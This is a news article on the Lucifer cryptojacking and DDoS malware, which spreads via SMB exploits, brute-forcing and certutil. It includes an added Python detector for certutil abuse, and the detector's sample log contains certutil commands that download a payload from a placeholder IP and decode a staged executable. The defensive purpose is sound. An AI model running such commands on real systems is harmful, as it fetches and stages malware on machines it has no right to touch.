Evil Lucifer Malware targets Windows systems with cryptojacking and distributed denial-of-service (DDoS) attacks
A downright devilish self-propagating new malware known as Lucifer is targeting Windows systems with cryptojacking and DDoS capabilities.
Lucifer, which has recently been identified, initially tries to infect PCs by bombarding them with a multitude of exploits in an effort to capitalize on unpatched vulnerabilities. While there are patches for all the critical and high-severity known bugs, the companies that have been targeted by Lucifer malware have not applied the fixes.
According to researchers with Palo Alto Networks’ Unit 42 team, “Lucifer is a new hybrid of cryptojacking and DDoS malware variant that leverages old vulnerabilities to spread and perform malicious activities on Windows platforms.”
After successfully exploiting these vulnerabilities, Lucifer connects to its command-and-control (C2) server and executes arbitrary commands on the compromised device. These commands include launching UDP, TCP or HTTP denial-of-service (DoS) attacks. Other commands instruct Lucifer to drop an XMRig miner and begin cryptojacking, or to collect network interface information.
Lucifer: A Self-Propagating Threat
In addition to brute-forcing victims’ credentials, Lucifer uses exploitation for self-propagation. If the Server Message Block (SMB) protocol is exposed, Lucifer can deploy several backdoors, including the EternalRomance, EternalBlue and DoublePulsar exploits.
After these three exploits have been used, the certutil utility is leveraged to propagate Lucifer. Certutil.exe is a command-line program that is installed as part of Certificate Services and can be used to dump and display certification authority (CA) configuration information, configure Certificate Services, back up and restore Certification Authority components, and verify certificates.
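From the defender's side, the certutil abuse described above is something process-creation logging can surface. The following is an added example, not code from the article or from Unit 42: it scans constructed process-creation records and flags certutil.exe being used as a downloader or decoder. The record format, the sample lines and the choice of suspicious switches (`-urlcache`, `-verifyctl`, `-decode`, `-decodehex`) are this example's assumptions; the article only states that certutil was used to propagate Lucifer.

```python
import re

# Assumption: these switches are chosen for this example as commonly abused;
# the article only states that certutil was used to propagate the malware.
DOWNLOAD_FLAGS = {"urlcache", "verifyctl"}
DECODE_FLAGS = {"decode", "decodehex"}
URL_RE = re.compile(r"https?://", re.IGNORECASE)

def parse_event(line):
    """Parse one 'Key=Value|Key=Value' record into a dict with lowercase keys."""
    event = {}
    for part in line.split("|"):
        key, _, value = part.partition("=")
        event[key.strip().lower()] = value.strip()
    return event

def classify_event(event):
    """Return the reasons a certutil event looks suspicious (empty if benign)."""
    if not event.get("image", "").lower().endswith("certutil.exe"):
        return []
    cmdline = event.get("commandline", "")
    tokens = cmdline.lower().split()
    # Windows tools accept both '-' and '/' switch prefixes; normalise both away.
    switches = {t.lstrip("-/") for t in tokens if t[0] in "-/"}
    reasons = []
    if switches & DOWNLOAD_FLAGS and URL_RE.search(cmdline):
        reasons.append("certutil fetching a remote URL")
    if switches & DECODE_FLAGS:
        reasons.append("certutil decoding a file (possible staged payload)")
    return reasons

def scan(lines):
    """Return [(line_number, reasons)] for every record that trips a rule."""
    alerts = []
    for number, line in enumerate(lines, start=1):
        reasons = classify_event(parse_event(line))
        if reasons:
            alerts.append((number, reasons))
    return alerts

# Constructed sample records; paths, URL and IP are placeholders, not IoCs.
SAMPLE_LOG = [
    "Image=C:\\Windows\\System32\\certutil.exe|CommandLine=certutil -dump",
    "Image=C:\\Windows\\System32\\certutil.exe|CommandLine=certutil -urlcache -split -f http://198.51.100.7/stage.bin C:\\Users\\Public\\stage.exe",
    "Image=C:\\Windows\\System32\\certutil.exe|CommandLine=certutil /decode C:\\Users\\Public\\blob.txt C:\\Users\\Public\\stage.exe",
    "Image=C:\\Windows\\System32\\notepad.exe|CommandLine=notepad.exe notes.txt",
]
if __name__ == "__main__":
    for number, reasons in scan(SAMPLE_LOG):
        print(f"line {number}: {'; '.join(reasons)}")
```

Only the second and third sample records are flagged; the legitimate `certutil -dump` call and the unrelated notepad.exe record pass through silently.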
Lucifer Rears His Evil Head
Lucifer malware has been discovered in a series of recent attacks that are thought to be ongoing. The first set of attacks occurred on June 10, 2020. The attackers resumed the campaign the next day with an upgraded version of the malware. Researchers say these upgrades included an anti-sandbox capability, an anti-debugger technique, and new checks for device drivers, DLLs and virtual devices.
This added functionality shows that Lucifer is growing in sophistication, according to researchers. Experts say companies can protect themselves with simple security measures such as checking for updates, applying patches and strengthening passwords.